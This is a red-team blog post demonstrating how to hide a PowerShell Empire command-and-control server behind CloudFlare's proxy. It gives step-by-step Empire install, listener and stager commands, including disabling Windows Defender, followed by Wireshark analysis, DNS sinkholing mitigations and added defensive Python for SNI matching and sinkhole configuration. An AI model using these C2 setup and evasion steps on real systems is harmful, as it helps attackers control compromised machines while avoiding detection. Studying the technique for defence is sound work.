PoC: Using Cloudflare as an HTTP C2 with Powershell Empire

For a red teamer, one of the biggest challenges is operating a command-and-control (C2) server without being discovered and blocked, because the traffic to it does not come from a trusted source. One way around this is to use CloudFlare’s free HTTP reverse proxy service in front of your C2. Because all HTTP traffic is pivoted through these proxies, it becomes much harder for a network defender to detect malicious intent.

DISCLAIMER

The information contained in this blog post is for educational purposes ONLY! HoldMyBeerSecurity.com/HoldMyBeer.xyz and its authors DO NOT hold any responsibility for any misuse or damage of the information provided in blog posts, discussions, activities, or exercises. 

DISCLAIMER

CloudFlare (CF) DNS records

Typical A record

Typical A records point a DNS resource at an IP address. For example, an A record for “google.com” points at the IP address of “216.58.217.110”. 

CloudFlare A record with proxy capabilities

Within CloudFlare, you create an A record and point it at an IP address. For example, “holdmybeersecurity.com” is pointed at the IP address of “198.211.100.42” with the proxy option on (orange cloud). However, if we use the MxToolBox tool above to look up my IP address, we get back “104.27.150.211” as the IP address. As a side note, CloudFlare MUST be the authoritative DNS provider for your domain for this to happen.

 

Internally, I ASSUME CloudFlare is setting the A record to one of its externally accessible IP addresses. When it receives an HTTP request for your domain on one of its proxies, it does a lookup for the actual IP address. As you can see below, a client is making an HTTP request to the server on the right, however, the request goes through CloudFlare’s NGINX reverse proxy and then to the requested server.

Install/Setup Powershell Empire with CloudFlare

CloudFlare DNS records

I own the following domain “malwarelove.xyz” and its authoritative DNS servers are set to CloudFlare. I created two A records, one record uses the proxy and one does not. “malwarelove.xyz” is an A record without the CloudFlare proxy and is pointed at the IP address of “129.21.110.78”. “proxy.malwarelove.xyz” is an A record with the CloudFlare proxy and is pointed at the IP address of “129.21.110.78”.

We can confirm these records with MxToolBox.

 

Download Empire

  1. cd /opt
  2. pip install pip==18.1
    1. Newer versions of pip break the install :/
  3. git clone https://github.com/EmpireProject/Empire
  4. cd Empire
  5. sudo ./setup/install.sh
  6. ./empire

Create Empire listeners

  1. listeners
  2. uselistener http
    1. set Name non-proxy-c2
    2. set Host http://malwarelove.xyz:80
    3. set Port 80
    4. execute
  3. back
  4. uselistener http
    1. set Name proxy-c2
    2. set Host https://proxy.malwarelove.xyz
    3. set Port 443
    4. set CertPath data/
    5. execute
  5. back
  6. listeners

Generate stager for non-proxy-c2 (HTTP)

  1. usestager multi/launcher non-proxy-c2
  2. execute
  3. Copy the output

Detonate the stager

  1. Boot up a Windows 10 VM
  2. Download and install Wireshark
  3. Start a Wireshark capture
  4. Disable Windows Defender
  5. Open a Powershell command prompt
  6. Paste the output above

Wireshark analysis

First, you may notice a DNS query for “malwarelove.xyz” with a response of “129.21.110.78”.

Second, you may notice a TCP handshake (Figure 1: TCP handshake) happening with a source IP address of “172.16.66.129” and a destination IP address of “129.21.110.78”. This is the actual IP address of our C2 server.

Third, you may notice an HTTP GET request for “http://malwarelove.xyz/news.php” for the IP address “129.21.110.78”.

Lastly, if you open a browser and browse to “http://malwarelove.xyz”, you will be presented with an IIS webpage. Additionally, this website is not encrypted, and you can verify that in the top left-hand corner: no green lock/Not secure.

Kill non-proxy-c2 agent

  1. agents
  2. kill <agent ID>

Generate stager for proxy-c2 (HTTPS)

  1. usestager multi/launcher proxy-c2
  2. execute
  3. Copy the output

Detonate the stager

  1. Open a Powershell command prompt
  2. Paste the output above

Wireshark analysis

First, you should notice a DNS query for “proxy.malwarelove.xyz” with a response of “104.27.150.87”.

Second, you may notice a TCP handshake (Figure 1: TCP handshake) happening with a source IP address of “172.16.66.129” and a destination IP address “”. This is the IP address of the CloudFlare reverse proxy and NOT our C2 server.

Third, you may notice a TLS “Client Hello”, “Client Key Exchange”, and “Application Data”. This is the setup of a working TLS-encrypted tunnel that encapsulates all of our HTTP traffic. We can no longer see the HTTP GET request because it is inside the encrypted tunnel. We can still confirm which host the client asked for by looking at the “Server name” field (the SNI extension) in the TLS “Client Hello”, which is sent in cleartext and should be set to “proxy.malwarelove.xyz”.

Finally, if you open a browser and browse to “https://proxy.malwarelove.xyz”, you will be presented with an IIS webpage, but notice the green lock in the top left-hand corner. If you select the lock and inspect the cert, you will see a signed cert for CloudFlare, but it is being used for your traffic as well.
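The cleartext “Server name” field described above is what a defender can still match on when the destination IP address belongs to CloudFlare. The following is an added example, not code from the original post: it extracts the SNI from a captured ClientHello record and checks it against a watchlist. The sample ClientHello is constructed inline, the watchlist is an assumption, and the parser assumes the whole ClientHello arrives in a single TLS record.

```python
import struct

def build_client_hello(host: str) -> bytes:
    """Constructed sample input: a minimal TLS ClientHello carrying only an SNI extension."""
    name = host.encode("ascii")
    entry = b"\x00" + struct.pack("!H", len(name)) + name       # name_type 0 = host_name
    sni = struct.pack("!HHH", 0, len(entry) + 2, len(entry)) + entry
    body = (b"\x03\x03" + bytes(32) + b"\x00"                   # version, random, empty session id
            + b"\x00\x02\x13\x01" + b"\x01\x00"                 # one cipher suite, null compression
            + struct.pack("!H", len(sni)) + sni)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake

def extract_sni(record: bytes):
    """Return the lower-cased server name from a ClientHello record, or None."""
    if len(record) < 44 or record[0] != 0x16 or record[5] != 0x01:
        return None                                             # not a handshake/ClientHello
    try:
        pos = 5 + 4 + 2 + 32                 # record header, handshake header, version, random
        pos += 1 + record[pos]               # session id
        pos += 2 + int.from_bytes(record[pos:pos + 2], "big")   # cipher suites
        pos += 1 + record[pos]               # compression methods
        end = min(len(record), pos + 2 + int.from_bytes(record[pos:pos + 2], "big"))
        pos += 2
        while pos + 4 <= end:                # walk the extension list
            ext_type, ext_len = struct.unpack_from("!HH", record, pos)
            pos += 4
            if ext_type == 0:                # server_name extension
                name_len = int.from_bytes(record[pos + 3:pos + 5], "big")
                name = record[pos + 5:pos + 5 + name_len]
                if record[pos + 2] != 0 or not name or len(name) != name_len:
                    return None              # not a host_name entry, or truncated capture
                return name.decode("ascii", "replace").lower()
            pos += ext_len
    except (IndexError, struct.error):
        pass                                 # truncated or malformed record
    return None

WATCHLIST = {"proxy.malwarelove.xyz"}        # assumption: FQDN flagged in the post

def is_watched(record: bytes) -> bool:
    """True when the ClientHello asks for a watchlisted host, whatever the destination IP."""
    return extract_sni(record) in WATCHLIST
```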

Mitigation

One mitigation against this attack is sink holing the malicious domain. “DNS sink holing is a mechanism aimed at protecting users by intercepting DNS request attempting to connect to known malicious or unwanted domains and returning a false, or rather controlled, IP address”.

For example, if you detect malicious activity for the following FQDN: “proxy.malwarelove.xyz”, you can create a zone on BIND for “malwarelove.xyz” on your local DNS server to point to 192.168.1.1. Any time a user in your environment requests that domain/FQDN, your server will respond with “192.168.1.1” as the IP address.
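The BIND sinkhole described above can be generated from a list of flagged zones. The following is an added example, not code from the original post: it renders the named.conf stanza and zone file for a sinkholed zone and shows which names the zone covers. The zone directory, the `localhost.` name server and the SOA timer values are assumptions.

```python
import ipaddress
import re

LABEL = re.compile(r"(?!-)[a-z0-9-]{1,63}(?<!-)")
SINKHOLE_NS = "localhost."        # assumption: placeholder name server for the local-only zone

def clean_zone(zone: str) -> str:
    """Normalise a zone name and refuse anything that could break out of the config."""
    zone = zone.rstrip(".").lower()
    if not zone or not all(LABEL.fullmatch(label) for label in zone.split(".")):
        raise ValueError(f"not a valid DNS name: {zone!r}")
    return zone

def zone_stanza(zone: str, zone_dir: str = "/etc/bind/sinkhole") -> str:
    """named.conf stanza that makes the local resolver authoritative for the zone."""
    zone = clean_zone(zone)
    return (f'zone "{zone}" {{\n'
            f'    type master;\n'
            f'    file "{zone_dir}/db.{zone}";\n'   # zone_dir is an assumed path
            f'}};\n')

def zone_file(sinkhole_ip: str, serial: int = 1) -> str:
    """Zone file answering the apex and every name below it with the sinkhole IP."""
    ip = ipaddress.IPv4Address(sinkhole_ip)          # rejects anything that is not IPv4
    return (f"$TTL 300\n"
            f"@ IN SOA {SINKHOLE_NS} hostmaster.{SINKHOLE_NS} ( {serial} 3600 600 86400 300 )\n"
            f"@ IN NS  {SINKHOLE_NS}\n"
            f"@ IN A   {ip}\n"                       # the wildcard does not match the apex
            f"* IN A   {ip}\n")                      # covers proxy.<zone> and any other label

def sinkhole_answer(fqdn: str, zones, sinkhole_ip: str):
    """IP the sinkholing resolver returns for fqdn, or None if no sinkholed zone covers it."""
    name = fqdn.rstrip(".").lower()
    for zone in map(clean_zone, zones):
        if name == zone or name.endswith("." + zone):   # match on a label boundary only
            return sinkhole_ip
    return None
```

Clients that land on the sinkhole address can then be identified from that host's connection logs.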

Take away

Attackers are getting smarter every day and they are using TRUSTED technologies to mask their activities. CloudFlare has the advantage of being a platform that is used widely in our industry. Additionally, analysis of malicious activity becomes harder because the IP address/platform for the C2 communication may be considered trusted. I have provided additional resources below on how to set up a sinkhole:

Here are some more resources on detecting C2 channels:


Resources/Sources
